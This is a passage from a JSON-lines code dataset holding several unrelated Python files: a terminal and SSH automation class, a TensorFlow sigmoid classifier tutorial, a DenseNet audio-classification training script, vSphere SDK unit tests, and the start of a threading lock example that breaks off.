day and prompt).\n\n It cycles reading a socket until it times out to automatically retrieve the banner message (motd) and the prompt.\n If given the expected_prompt, we will only wait until we get expected_prompt or login_timeout whoever is first\n\n \"\"\"\n\n # send a new line\n self.send_line()\n data_received, prompt_timer_expired, prompt_found = self._find_prompt(terminal, terminal.shell.prompt)\n\n if not data_received:\n raise exceptions.ExpectLoginError('Did not get any banner message or prompt???')\n\n data_received_lines = data_received.splitlines()\n prompt = re.escape(prompt_found or self.__get_last_line_prompt(data_received_lines))\n banner = '\\n'.join(data_received_lines)\n\n if previous_prompt and prompt == previous_prompt and self.check_same_prompt_when_opening_terminal:\n raise exceptions.ExpectLoginError('The prompt is still the same ({}). '\n 'We might have not logged into anywhere'.format(previous_prompt))\n\n elif not self.allow_non_expected_prompt and terminal.shell.prompt and prompt_timer_expired:\n raise exceptions.ExpectLoginError('The expected prompt {} is different to the one we got {}. 
'\n 'We must be in the wrong place'.format(terminal.shell.prompt, prompt))\n else:\n return banner, prompt\n\n def _find_prompt(self, terminal, new_prompt=None, timeout=0):\n prompt_regex = re.compile(new_prompt, re.M) if new_prompt else None\n\n data_received = ''\n if not timeout:\n timeout = terminal.shell.connect_timeout\n\n prompt_found = ''\n\n with utils.classes.SimpleTimer(timeout) as timer:\n while timer.has_not_expired:\n if prompt_regex:\n m = prompt_regex.search(data_received)\n if m:\n prompt_found = m.group(0)\n break\n try:\n data = self.recv() \n if data:\n data_received += data\n\n except exceptions.ConnectionReadTimeoutError:\n break\n\n return data_received, timer.has_expired, prompt_found\n\n def set_prompt(self, new_prompt, timeout=0):\n if new_prompt == self.prompt:\n return True\n\n set_prompt_cmd = self.current.os.cmd.set_prompt(new_prompt)\n self.send_cmd(set_prompt_cmd)\n self.send_line()\n\n data_received, prompt_was_not_found, _ = self._find_prompt(self.current, new_prompt, timeout=timeout)\n\n if prompt_was_not_found:\n log.error(\"we could not change the prompt from ({}) to ({}) using command ({}). Output: {}\"\n \"\".format(self.prompt, new_prompt, set_prompt_cmd, data_received))\n raise exceptions.CalledProcessError(-1, set_prompt_cmd, data_received)\n else:\n log.debug(\"New prompt successfully changed.\")\n self.prompt = new_prompt\n\n def _check_output_nb(self, command, **kwargs):\n pass\n\n def check_output(self, command, use_sudo=False, stderr_to_tmp=False, stderr_to_out=False, recv_stream=None,\n **kwargs):\n\n command = self._get_cmd(command, use_sudo, stderr_to_tmp)\n send = self.send_with_stderr if stderr_to_out else self.send_cmd\n\n send(command, recv_stream=recv_stream)\n\n if use_sudo:\n e = self.expect(expect.ExpectedRegex(PASSWORD_PROMPT_REGEX, name='password'), \n expect.ExpectedPrompt(),\n **kwargs)\n\n if e.matched and e.matched_index == 0:\n e = send(self.current.conn.password).expect_prompt(**kwargs)\n else:\n e = self.expect_prompt(**kwargs)\n\n if e.matched:\n log.debug('<<< Matched Received: \\n' + e.string_before_match)\n return e.string_before_match.rstrip('\\n')\n\n raise exceptions.CalledProcessError(-1, command,\n \"Did not find prompt ({}). 
\"\n \"This is the output we got: {}\"\n \"\".format(self.prompt, self.data.get_last_recv()))\n\n def flush_recv(self, force_ctrl_c=True, timeout=0.1):\n \"\"\" flushes the receive buffer\n Args:\n force_ctrl_c: flag to indicate that if we timeout try sending a control c, in case we have a long running task\n timeout: timeout to keep reading the buffer while data is present\n\n Returns:\n\n \"\"\"\n t0 = time.time()\n flush_data = 1\n while (time.time() - t0 < timeout) and flush_data:\n try:\n flush_data = self.recv()\n except Exception:\n break\n\n remaining_time = time.time() - t0\n if remaining_time >= timeout:\n if force_ctrl_c:\n self.send_ctrl_c()\n self.flush_recv(False, timeout=remaining_time)\n\n return self\n\n def send_cmd(self, cmd, flush=True, recv_stream=None):\n if flush and self.last_cmd_sent:\n self.flush_recv()\n return self.send(cmd, True, recv_stream=recv_stream)\n\n def send_cmds(self, cmds, time_between=0.1, flush=True, recv_stream=None):\n if flush and self.last_cmd_sent:\n self.flush_recv()\n for cmd in cmds:\n self.send(cmd, True, recv_stream=recv_stream)\n time.sleep(time_between)\n return self\n \n def send_sudo_cmd(self, cmd, password=None, password_regex=r'(?i)password[^:]*:'):\n try:\n expect_return = self.send_cmd('sudo ' + cmd).expect_regex(password_regex)\n\n except socket.timeout:\n log.exception('did not find password. maybe we did not need password?')\n raise\n\n else: \n self.send_cmd(password or self.current.conn.password)\n return self\n \n def send_confirmed_password(self, password=None, password_regex=PASSWORD_PROMPT_REGEX, cmd_is_hidden=False):\n password = password or self.current.conn.password\n \n self.expect_regex(password_regex, cmd_is_hidden=cmd_is_hidden)\n self.send_cmd(password)\n self.expect_regex(password_regex, cmd_is_hidden=True)\n self.send_cmd(password)\n \n return self.expect_prompt(cmd_is_hidden=True, chain=True)\n\n def send_ctrl_c(self):\n return self.send(\"\\x03\").send_line(False)\n\n def send_line(self, flush=True):\n return self.send_cmd('', flush)\n\n enter = send_line\n\n def send_with_stderr(self, cmd, flush=True, recv_stream=None):\n return self.send_cmd(cmd + \" 2>&1\", flush, recv_stream=recv_stream)\n\n def send(self, cmd, new_line=False, metadata=None, recv_stream=None):\n cmd = str(cmd).strip()\n if new_line:\n # add new line to command if not given already\n if not cmd or cmd[-len(self.new_line)] != self.new_line:\n cmd += self.new_line\n\n log.debug(\"{}{} - Sending cmd/data: {}\".format('' if not metadata else 'MetaInfo: {}'.format(metadata),\n self.__class__.__name__, escape_string(cmd)))\n self._transport.send(cmd)\n self.last_cmd_sent = cmd\n self.data.new_sent(cmd, metadata=metadata, recv_stream=recv_stream)\n return self\n\n def log_recv(self):\n log.debug('<<< Received: \\n{}'.format(escape_string(self.data.get_last_recv())))\n\n def expect(self, *expect_value_list, **kwargs):\n exp_object = expect.Expect(self.last_cmd_sent)\n for v in expect_value_list:\n if not isinstance(v, expect.ExpectedRegex):\n v = expect.ExpectedRegex(v)\n exp_object.add(v)\n return self._expect_cmd(exp_object, **kwargs)\n\n def exec_ask_response_list(self, ask_response_list, stop_after_count_matches=0, stop_after_getting=None,\n timeout_after_first_match=0, remove_prompt_to_compare=True, **kwargs):\n \"\"\" simple procedure to go through a list of expected values and their corresponding responses (not an automata)\n\n note: values are expected only once, so if you expect it more times add the same one more than one\n\n Args:\n 
ask_response_list:\n stop_after_count_matches:\n **kwargs:\n\n Returns:\n\n \"\"\"\n expect_list = {}\n\n ask_resp_list_by_name = dict([(r.get('name', str(i)), r) for (i, r) in enumerate(ask_response_list)])\n\n for name, r in ask_resp_list_by_name.items():\n expect_list[name] = expect.ExpectedRegex(r['ask'], name=name, flags=r.get('flags', re.I),\n remove_prompt_to_compare=remove_prompt_to_compare)\n\n i = 0\n match_set = set()\n\n if stop_after_count_matches:\n stop_after_count_matches = min(stop_after_count_matches, len(ask_response_list))\n else:\n stop_after_count_matches = len(ask_response_list)\n\n while i < stop_after_count_matches:\n exp = self.expect(*expect_list.values(), **kwargs)\n if exp.matched:\n self.send_cmd(ask_resp_list_by_name[exp.matched_name]['resp'])\n kwargs['cmd_is_hidden'] = ask_resp_list_by_name[exp.matched_name].get('hidden', False)\n\n match_set.add(exp.matched_name)\n del expect_list[exp.matched_name]\n\n if stop_after_getting is not None and exp.matched_name == stop_after_getting or \\\n exp.matched_name == 'prompt':\n return match_set\n\n if timeout_after_first_match:\n kwargs['timeout'] = timeout_after_first_match\n else:\n return match_set\n i += 1\n\n return match_set\n\n def expect_all(self, *expect_value_list, **kwargs):\n kwargs.setdefault('all_matches_required', True)\n return self.expect(*expect_value_list, **kwargs)\n\n def expect_all_in_sequence(self, *expect_value_list, **kwargs):\n kwargs.setdefault('all_matches_required', True)\n kwargs.setdefault('all_matches_in_sequence', True)\n return self.expect(*expect_value_list, **kwargs)\n\n def expect_regex(self, regex, flags=0, timeout=0, **kwargs):\n return self.expect(expect.ExpectedRegex(regex, flags), timeout=timeout, **kwargs)\n\n def expect_string(self, string, timeout=0, **kwargs):\n return self.expect(expect.ExpectedString(string), timeout=timeout, **kwargs)\n\n def expect_prompt(self, timeout=0, **kwargs):\n return self.expect(expect.ExpectedPrompt(), timeout=timeout, **kwargs)\n\n def expect_istring(self, string, timeout=0, **kwargs):\n kwargs.setdefault('flags', 0)\n kwargs['flags'] |= re.I\n return self.expect(expect.ExpectedString(string), timeout=timeout, **kwargs)\n\n def expect_new_prompt(self, new_prompt=None, timeout=0):\n self.get_new_prompt(timeout=timeout, new_prompt=new_prompt)\n\n return self.send_line().expect_prompt()\n\n def find_login_info(self, terminal):\n\n if terminal == self.current:\n raise ValueError('The channel provided is the same as the current. 
There must be an error.')\n\n old_prompt = self.prompt if self._terminals else None\n terminal.shell.banner, terminal.shell.prompt = self._get_banner_and_prompt(terminal, old_prompt)\n self._terminals.append(terminal)\n\n def expect_logout(self):\n old_shell = self._terminals.pop()\n try:\n exp = self.send_line().expect_prompt()\n if not exp.matched:\n raise exceptions.ExpectLoginError('expecting logout but did '\n 'not get the previous terminal prompt: ' + self.prompt)\n else:\n return exp\n except Exception:\n self._terminals.append(old_shell)\n raise\n\n def get_new_prompt(self, timeout=0, update=True, new_prompt=None):\n data, prompt_was_not_found, prompt_found = self._find_prompt(self.current, new_prompt=new_prompt, timeout=timeout)\n\n if not data:\n raise exceptions.CalledProcessError(-1, self.last_cmd_sent, data)\n \n elif update:\n self.prompt = re.escape(prompt_found or data.splitlines()[-1])\n\n return self.prompt\n\n def record(self, timeout=None, record_stop_signal=None, output_stream=None, time_to_sleep_between_recv=None):\n\n time_to_sleep_between_recv = time_to_sleep_between_recv or self.sleep_time_after_no_data\n\n timer = utils.classes.get_timer_from_timeout(timeout)\n\n stream = output_stream or StringIO()\n\n while not (self.stop_signal.is_set() or\n record_stop_signal and record_stop_signal.is_set() or\n timer and timer.has_expired):\n\n recv = self.recv()\n\n if recv == 0:\n self.close()\n log.error('recv command return empty string. End side might have been closed!')\n raise socket.error\n\n elif recv != constants.SOCKET_RECV_NOT_READY:\n stream.write(recv)\n\n else:\n time.sleep(time_to_sleep_between_recv)\n\n return stream\n\n def _expect_cmd(self, expect_cmd, timeout=None, reset_on_new_line=False, cmd_is_hidden=False, chain=False):\n\n def _check_match(comp_buff):\n return comp_buff and expect_cmd.find_expected_values_and_prompt_in_buffer(comp_buff, self.prompt)\n\n # accumulated responses from server\n buff = ''\n\n # reset expected values counter in case we are reusing an expect object\n expect_cmd.reset()\n\n cmd_removed = cmd_is_hidden\n\n # get cmd info and weather the command has multiple lines\n cmd = str(expect_cmd.command)\n cmd_lines = cmd.splitlines(True)\n cmd_lines_num = len(cmd_lines)\n cmd_line_counter = 0\n\n # flag to check if at least one recv was successful before socket timeout\n received_anything = found_match = False\n\n # timer\n timer = utils.classes.get_timer_from_timeout(timeout or self.timeout)\n\n try:\n match_found = False\n while not(match_found or timer.has_expired or self.stop_signal.is_set()):\n\n recv = self.recv()\n\n if recv == 0:\n self.close()\n log.error('recv command return empty string. 
End side might have been closed!')\n raise socket.error\n\n elif recv != constants.SOCKET_RECV_NOT_READY:\n received_anything = True\n\n buff += recv \n\n if not cmd_removed:\n buff, cmd_removed = _remove_cmd_from_buffer(buff, cmd_line_counter, cmd_lines, cmd_lines_num,\n cmd_removed)\n if cmd_removed:\n\n if reset_on_new_line:\n string_to_match, buff, found_match = _get_string_to_match(buff, _check_match)\n if found_match:\n break\n else:\n string_to_match = buff \n\n if _check_match(string_to_match):\n break\n\n else:\n time.sleep(self.sleep_time_after_no_data)\n\n else: # no break\n\n if timer.has_expired:\n raise exceptions.ConnectionReadTimeoutError('failed to match before timeout: '\n '' + str(timeout or self.timeout))\n\n except socket.timeout:\n\n log.debug('Did not receive any data for a while ' + str(expect_cmd))\n\n if not received_anything:\n log.error('Did not receive any data before the socket timeout ({}). Increase the timeout or '\n 'check the command or system under test.'.format(str(self._transport.timeout)))\n raise socket.error\n\n if not chain:\n return expect_cmd\n else:\n return self\n\n\n def _update_login(self, results, number_of_lines_for_prompt, new_line, shell=None):\n results.seek(0)\n welcome_message_lines = results.read().splitlines()\n prompt = '\\n'.join(welcome_message_lines[len(welcome_message_lines) - number_of_lines_for_prompt:])\n\n if shell is None:\n shell = shells.LoginShell()\n\n # checks if expected prompt is the one we got and if we are not skipping the check raise an exception\n if shell.prompt is None and re.search(self.prompt, prompt) and not shell.skip_prompt_check:\n raise exceptions.ExpectLoginError\n\n shell.update(welcome_message=welcome_message_lines[:-number_of_lines_for_prompt],\n prompt=prompt, number_of_lines_for_prompt=number_of_lines_for_prompt,\n new_line=new_line)\n # do not copy if it is already added\n if self._terminals[-1] != shell:\n self._terminals.append(shell)\n\n","sub_path":"course/test_envi/connections/terminal/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":26124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"593569097","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nstep03_sigmoid_classifier.py\r\n\r\n - 활성함수(activatio functon) : sigmoid\r\n - 손실함수(loss function) : cross entropy \r\n\"\"\"\r\n\r\nimport tensorflow.compat.v1 as tf # ver1.x\r\ntf.disable_v2_behavior() # ver2.x 사용 안함 \r\n\r\nfrom sklearn.metrics import accuracy_score # model 평가 \r\n\r\n# 1. x, y 공급 data \r\n# x변수 : [hours, video]\r\nx_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]] # [6,2]\r\n\r\n# y변수 : binary data (fail or pass)\r\ny_data = [[0], [0], [0], [1], [1], [1]] # [6, 1] \r\n\r\n# 2. X, Y변수 정의 \r\nX = tf.placeholder(dtype=tf.float32, shape = [None, 2])#[관측치,입력수]\r\nY = tf.placeholder(dtype=tf.float32, shape = [None, 1])#[관측치,출력수]\r\n\r\n# 3. w,b 변수 정의 \r\nw = tf.Variable(tf.random_normal([2, 1]))# [입력수, 출력수]\r\nb = tf.Variable(tf.random_normal([1])) # [출력수]\r\n\r\n# 4. 
sigmoid classifier \r\n# (1) model : prediction \r\nmodel = tf.matmul(X, w) + b # regression equation \r\nsigmoid = tf.sigmoid(model) # apply activation function (probability between 0 and 1) \r\n\r\n# (2) loss function : Entropy formula = -sum(Y * log(model)) \r\nloss = -tf.reduce_mean(Y * tf.log(sigmoid) + (1-Y) * tf.log(1-sigmoid))\r\n\r\n# (3) optimizer \r\n'''\r\nopt = tf.train.GradientDescentOptimizer(0.1)\r\ntrain = opt.minimize(loss)\r\n'''\r\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(loss) # optimizer object \r\n\r\n# (4) cut-off : 0.5\r\ncut_off = tf.cast(sigmoid > 0.5, tf.float32) # T/F -> 1.0/0.0\r\n\r\n# 5. model training\r\nwith tf.Session() as sess :\r\n    sess.run(tf.global_variables_initializer()) # initialize w, b\r\n\r\n    feed_data = {X : x_data, Y : y_data} # data to feed \r\n\r\n    # iterative training : 500 steps \r\n    for step in range(500) : \r\n        _, loss_val = sess.run([train, loss], feed_dict = feed_data)\r\n\r\n        if (step+1) % 50 == 0 :\r\n            print(\"step = {}, loss = {}\".format(step+1, loss_val))\r\n\r\n    # model evaluation \r\n    y_true = sess.run(Y, feed_dict = feed_data)\r\n    y_pred = sess.run(cut_off, feed_dict = feed_data)\r\n\r\n    acc = accuracy_score(y_true, y_pred)\r\n    print(\"accuracy = \", acc) # 1.0\r\n\r\n    print(\"y_true :\", y_true)\r\n    print(\"y_pred :\", y_pred)\r\n","sub_path":"chap04_Classifier/lecture_1x/step03_sigmoid_classifier.py","file_name":"step03_sigmoid_classifier.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"632685951","text":"import tensorflow as tf\nimport os\nimport argparse\n\n\ndef parse_example(example):\n    \"\"\"\n    Parse a single TFRecord example into dense audio and label tensors.\n    :param example:\n    :return:\n    \"\"\"\n    keys_to_features = {\n        'audio': tf.VarLenFeature(tf.float32),\n        'label': tf.VarLenFeature(tf.float32),\n    }\n    parsed = tf.parse_single_example(example, keys_to_features)\n    audios = tf.sparse_tensor_to_dense(parsed['audio'], default_value=0)\n    labels = tf.sparse_tensor_to_dense(parsed['label'], default_value=0)\n    return audios, labels\n\n\ntrain_path = os.path.join('/home/ccyoung/DCase', 'train.tfrecords')\ntest_path = os.path.join('/home/ccyoung/DCase', 'test.tfrecords')\n\n\ndef create_model():\n    from densenet2 import DenseNet\n    # dense_net = DenseNet(7, 12, 3, 10, 5,\n    #                      bottleneck=True, compression=0.5, weight_decay=1e-4, dropout_rate=0.2, pool_initial=False,\n    #                      include_top=True)\n\n    # return dense_net.build(input_shape=(128, 47, 2)\n    #                        )\n    # note: relies on the module-level args parsed in __main__\n    return DenseNet(7, args.grow_rate, args.n_db, 10, args.nb_layers, data_format=args.data_format,\n                    bottleneck=True, compression=0.5, weight_decay=1e-4, dropout_rate=0.2, pool_initial=False,\n                    include_top=True)\n\n\ndef model_fn(features, labels, mode, params):\n    model = create_model()\n\n    if mode == tf.estimator.ModeKeys.TRAIN:\n        optimizer = tf.train.MomentumOptimizer(0.001, momentum=0.9, use_nesterov=True)\n\n        logits = model(features)\n        print(labels.shape)\n        loss = tf.losses.sparse_softmax_cross_entropy(labels=tf.argmax(labels, axis=1, output_type=tf.int64), logits=logits) + tf.add_n(model.losses)\n        accuracy = tf.metrics.accuracy(\n            labels=tf.argmax(labels, axis=1, output_type=tf.int64), predictions=tf.argmax(logits, axis=1, name='acc_op')\n        )\n        tf.summary.scalar('acc', accuracy[1])\n        tf.summary.scalar('loss', loss)\n        return tf.estimator.EstimatorSpec(\n            mode=tf.estimator.ModeKeys.TRAIN,\n            loss=loss,\n            train_op=optimizer.minimize(loss, tf.train.get_or_create_global_step())\n        )\n    if mode == tf.estimator.ModeKeys.EVAL:\n        logits = model(features)\n        loss = tf.losses.sparse_softmax_cross_entropy(labels=tf.argmax(labels, axis=1, output_type=tf.int64), logits=logits)\n        accuracy = tf.metrics.accuracy(\n            labels=tf.argmax(labels, axis=1, output_type=tf.int64), predictions=tf.argmax(logits, axis=1, name='acc_op')\n        )\n        tf.summary.scalar('eval_loss', loss)\n        tf.summary.scalar('eval_acc', accuracy[1])\n        return tf.estimator.EstimatorSpec(\n            mode=tf.estimator.ModeKeys.EVAL,\n            loss=loss,\n            eval_metric_ops={'accuracy': accuracy})\n\n    # if mode == tf.estimator.ModeKeys.PREDICT:\n    #     logits = model(features)\n    #     predictions = {\n    #         'classes': tf.argmax(logits, axis=1),\n    #         'probabilities': tf.nn.softmax(logits),\n    #     }\n    #     return tf.estimator.EstimatorSpec(\n    #         mode=tf.estimator.ModeKeys.PREDICT,\n    #         predictions=predictions,\n    #         export_outputs={\n    #             'classify': tf.estimator.export.PredictOutput(predictions)\n    #         }\n    #     )\n\n\ndef train_input_fn(args):\n    \"\"\" like generator\"\"\"\n    train_ds = tf.data.TFRecordDataset(train_path).map(parse_example).shuffle(62000).apply(\n        tf.contrib.data.batch_and_drop_remainder(args.batch_size)).repeat(args.epochs)\n    audios, labels = train_ds.make_one_shot_iterator().get_next()\n    audios = tf.reshape(audios, (args.batch_size, 128, 47, 2))\n    labels = tf.cast(labels, tf.int64)\n    return audios, labels\n\n\ndef eval_input_fn(args):\n    \"\"\" like generator\"\"\"\n    dataset = tf.data.TFRecordDataset(test_path).map(parse_example).apply(\n        tf.contrib.data.batch_and_drop_remainder(args.batch_size))\n\n    audios, labels = dataset.make_one_shot_iterator().get_next()\n    audios = tf.reshape(audios, (args.batch_size, 128, 47, 2))\n    labels = tf.cast(labels, tf.int64)\n    return audios, labels\n\n\ndef run_estimator_train(args):\n    estimator = tf.estimator.Estimator(\n        # config=tf.estimator.RunConfig(\n        #     model_dir=args.output_dir, save_summary_steps=100, keep_checkpoint_max=5,),\n        model_fn=model_fn,\n        # model_dir=args.output_dir,\n        params={\n            'data_format': args.data_format,\n        })\n    train_spec = tf.estimator.TrainSpec(input_fn=lambda: train_input_fn(args),\n                                        max_steps=(61220 // args.batch_size) * args.epochs)\n    eval_spec = tf.estimator.EvalSpec(input_fn=lambda: eval_input_fn(args))\n\n    tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)\n\n\ndef define_task_eager_flags():\n    \"\"\"\n    Define some command-line flags so the project can be run from the terminal.\n    :return:\n    \"\"\"\n    arg = argparse.ArgumentParser()\n    arg.add_argument('--batch_size', type=int, default=1)\n    arg.add_argument('--epochs', type=int, default=5)\n    arg.add_argument('--nb_layers', type=int, default=2)\n    arg.add_argument('--n_db', type=int, default=2)\n    arg.add_argument('--grow_rate', type=int, default=12)\n    arg.add_argument('--data_format', type=str, default='channels_last')\n    arg.add_argument('--output_dir', type=str, default='/home/ccyoung/')\n    arg.add_argument('--lr', type=float, default=0.001)\n    arg.add_argument('--log_interval', type=int, default=10)\n    arg.add_argument('--alpha', type=float, default=0.2)\n\n    args = arg.parse_args()\n    return args\n\n\ndef main(args):\n    # train once, and stop the cloud instance whether training succeeds or fails\n    try:\n        run_estimator_train(args)\n    finally:\n        finish_instance()\n    # run_task_eager(args)\n    # finish_instance()\n\n\ndef finish_instance():\n    os.system('sh /data/stop_instance.sh')\n\n\nif __name__ == '__main__':\n    args = define_task_eager_flags()\n    main(args)\n","sub_path":"src/Estimator_DenseNet_train.py","file_name":"Estimator_DenseNet_train.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"238857819","text":"from pprint import pprint\nfrom unittest import TestCase\n\nfrom osbot_utils.testing.Catch import Catch\n\nfrom k8_vmware.helpers.TestCase_VM import TestCase_VM\nfrom k8_vmware.helpers.View_Soap_Calls import View_Soap_Calls\nfrom k8_vmware.vsphere.Sdk import Sdk\nfrom pyVmomi import pyVmomi\nfrom k8_vmware.vsphere.VM import VM\n\n\nclass test_Sdk(TestCase_VM):\n vm_name = f\"tests__unit__\" + __name__\n\n def setUp(self):\n self.sdk = Sdk()\n\n def test_about(self):\n content = self.sdk.about()\n assert content.vendor == \"VMware, Inc.\"\n assert content.version == \"6.7.0\"\n assert content.licenseProductName == \"VMware ESX Server\"\n assert content.licenseProductName == \"VMware ESX Server\"\n assert content.licenseProductVersion == \"6.0\"\n\n def test_file_info(self):\n datastore_path = 'an data store'\n vmx_file = self.sdk.file_info(datastore_path)\n assert vmx_file.vmPathName == datastore_path\n\n # def test_find_iso(self):\n # vm = self.sdk.find_by_host_name('haproxy-icap')\n # #pprint(vm.info())\n # #print(self.sdk.json_dump(\"VirtualMachine\",\"42\"))\n # #vim.vm.device.VirtualCdrom\n # print(vm.config().hardware)\n\n def test_find_by_host_name(self):\n for vm in self.sdk.vms():\n host_name = vm.host_name()\n if host_name:\n assert self.sdk.find_by_host_name(host_name).host_name() == host_name\n return\n print(\"Warning test ESX server had no VMs with host_names (dnsNames) setup\")\n\n def test_find_by_name(self):\n assert self.sdk.find_by_name(self.vm_name).name() == self.vm_name\n assert self.sdk.find_by_name(\"AAA_BBB_CCC\") is None\n\n\n def test_find_by_ip(self):\n for vm in self.sdk.vms():\n ip = vm.ip()\n if ip:\n assert self.sdk.find_by_ip(ip).ip() == ip\n return\n print(\"Warning test ESX server had no VMs with IPs\")\n\n def test_find_by_uuid(self):\n uuid = self.vm.uuid()\n assert self.sdk.find_by_uuid(uuid).uuid() == uuid\n\n def test_get_object(self):\n with View_Soap_Calls():\n name = self.vm.name()\n vm = self.sdk.get_object(pyVmomi.vim.VirtualMachine,name)\n pprint(vm)\n #assert vm.name == name\n\n def test_get_objects_Datastore(self):\n datastores = self.sdk.get_objects_Datastore()\n assert len(datastores) >0\n\n def test_get_object_virtual_machine(self):\n name = self.vm.name()\n vm = VM(self.sdk.get_object_virtual_machine(name))\n assert vm.name() == name\n\n def test_get_objects(self):\n objects = self.sdk.get_objects()\n assert len(objects) > 0\n\n def test_get_objects_properties(self):\n\n target_objects = [self.vm.vm] # use a temp vm to make sure we always have one\n object_type = type(self.vm.vm)\n vm_id = self.vm.id()\n\n properties_names = self.sdk.object_properties_names(object_type)\n results = self.sdk.get_objects_properties(object_type, target_objects, properties_names)\n\n assert vm_id == f'vim.VirtualMachine:{self.vm.moid()}'\n assert vm_id in results\n assert len(results) == 1\n object_properties = results[vm_id]\n properties_names.remove('alarmActionsEnabled') # these properties are not returned from the server\n properties_names.remove('parentVApp')\n properties_names.remove('snapshot')\n assert sorted(list(set(object_properties))) == sorted(properties_names)\n assert object_properties['name'] == self.vm.name()\n\n # to get properties from all current VMs use:\n # target_objects = self.sdk.get_objects_Virtual_Machines()\n\n\n def test_folders(self):\n folders = self.sdk.folders()\n assert str(folders) == \"['vim.Folder:ha-folder-vm']\"\n\n def test_object_filter_spec(self):\n # see test_get_objects_properties\n 
pass\n\n def test_object_methods_names(self):\n object_type = pyVmomi.vim.VirtualMachine\n method_names = self.sdk.object_methods_names(object_type)\n assert method_names == ['SetCustomValue', 'Destroy', 'Reload','Rename', # these ones where not in list(object._methodInfo.keys())\n 'AcquireMksTicket', 'AcquireTicket', 'Answer', 'ApplyEvcMode', 'AttachDisk', 'CheckCustomizationSpec', 'Clone', 'ConsolidateDisks', 'CreateScreenshot', 'CreateSecondaryEx',\n 'CreateSecondary', 'CreateSnapshotEx', 'CreateSnapshot', 'CryptoUnlock', 'Customize', 'DefragmentAllDisks', 'DetachDisk', 'DisableSecondary', 'DropConnections', 'EnableSecondary',\n 'EstimateStorageRequirementForConsolidate', 'ExportVm', 'ExtractOvfEnvironment', 'InstantClone', 'MakePrimary', 'MarkAsTemplate', 'MarkAsVirtualMachine', 'Migrate', 'MountToolsInstaller',\n 'PowerOff', 'PowerOn', 'PromoteDisks', 'PutUsbScanCodes', 'QueryChangedDiskAreas', 'QueryConnections', 'QueryFaultToleranceCompatibility', 'QueryFaultToleranceCompatibilityEx',\n 'QueryUnownedFiles', 'RebootGuest', 'Reconfigure', 'RefreshStorageInfo', 'Relocate', 'RemoveAllSnapshots', 'ResetGuestInformation', 'Reset', 'RevertToCurrentSnapshot', 'SendNMI',\n 'SetDisplayTopology', 'SetScreenResolution', 'ShutdownGuest', 'StandbyGuest', 'StartRecording', 'StartReplaying', 'StopRecording', 'StopReplaying', 'Suspend', 'TerminateFaultTolerantVM',\n 'Terminate', 'TurnOffFaultTolerance', 'UnmountToolsInstaller', 'Unregister', 'UpgradeTools', 'UpgradeVirtualHardware', 'ReloadFromPath']\n\n datastore_methods = self.sdk.object_methods_names(pyVmomi.vim.Datastore)\n\n assert datastore_methods == ['SetCustomValue', 'Destroy', 'Reload', 'Rename', 'EnterMaintenanceMode', 'ExitMaintenanceMode', 'DestroyDatastore', 'Refresh', 'RefreshStorageInfo',\n 'RenameDatastore', 'UpdateVVolVirtualMachineFiles', 'UpdateVirtualMachineFiles']\n\n def test_object_properties_names(self):\n object_type = pyVmomi.vim.VirtualMachine\n\n properties_names = self.sdk.object_properties_names(object_type)\n assert properties_names == ['value', 'availableField', 'parent', 'customValue', 'overallStatus', 'configStatus', 'configIssue', 'effectiveRole', 'permission', 'name', 'disabledMethod', 'recentTask',\n 'declaredAlarmState', 'triggeredAlarmState', 'alarmActionsEnabled', 'tag', 'capability', 'config', 'layout', 'layoutEx', 'storage', 'environmentBrowser', 'resourcePool',\n 'parentVApp', 'resourceConfig', 'runtime', 'guest', 'summary', 'datastore', 'network', 'snapshot', 'rootSnapshot', 'guestHeartbeatStatus']\n\n datastore_properties = self.sdk.object_properties_names(pyVmomi.vim.Datastore)\n assert datastore_properties == ['value', 'availableField', 'parent', 'customValue', 'overallStatus', 'configStatus', 'configIssue', 'effectiveRole', 'permission', 'name', 'disabledMethod', 'recentTask',\n 'declaredAlarmState', 'triggeredAlarmState', 'alarmActionsEnabled', 'tag', 'info', 'summary', 'host', 'vm', 'browser', 'capability', 'iormConfiguration']\n\n def test_vms(self):\n vms = self.sdk.vms()\n assert len(vms) > 0\n\n def test_names(self):\n names = self.sdk.vms_names()\n assert len(names) > 0\n\n def test_service_instance(self):\n service_instance = self.sdk.service_instance()\n assert service_instance.content.about.apiVersion == '6.7.3'\n assert service_instance.content.about.licenseProductName == 'VMware ESX Server'\n assert service_instance.content.about.osType == 'vmnix-x86'\n\n # def test_dump_json(self):\n #\n # obj_type = \"VirtualMachine\"\n # moid = self.vm.moid()\n #\n # json_dump = 
self.sdk.json_dump(obj_type, moid)\n # json_data = json.loads(json_dump)\n # assert json_data['_vimid' ] == moid\n # assert json_data['_vimtype'] == \"vim.VirtualMachine\"\n\n\n # todo: fix experiment (see tasks_recent_experiment)\n def test_tasks(self): # todo: find better way to do this since when running multiple tests the self.sdk.tasks_recent() can take multiple seconds to execute\n #with View_Soap_Calls():\n # with Catch():\n # #pprint(self.sdk.get_objects())\n # self.sdk.find_by_ip('aaaaaa')\n # recent_tasks = self.sdk.tasks_recent(self.vm.vm)\n # pprint(recent_tasks)\n # return\n self.sdk.find_by_ip('aaaaaa')\n recent_tasks = self.sdk.tasks_recent()\n most_recent_one = recent_tasks.pop()\n\n assert most_recent_one['DescriptionId'] == 'SearchIndex.findByIp'\n assert most_recent_one['Key' ] == f\"haTask--vim.SearchIndex.findByIp-{most_recent_one['EventChainId']}\"\n assert most_recent_one['State' ] == 'success'\n assert most_recent_one['Entity' ] == 'None'\n","sub_path":"tests/unit/vsphere/test_Sdk.py","file_name":"test_Sdk.py","file_ext":"py","file_size_in_byte":9229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"520865840","text":"# name : slip \n# date : 2019/7/6 9:17 \n# e-mail : slip1233@126.com\n\nimport threading\nimport time\n\nDICT = {}\nlock = threading.RLock()\n\ndef func(arg):\n\n lock.acquire()\n ident = threading.get_ident()\n DICT[ident] = arg\n time.sleep(0.1)\n print(DICT[ident], arg)\n 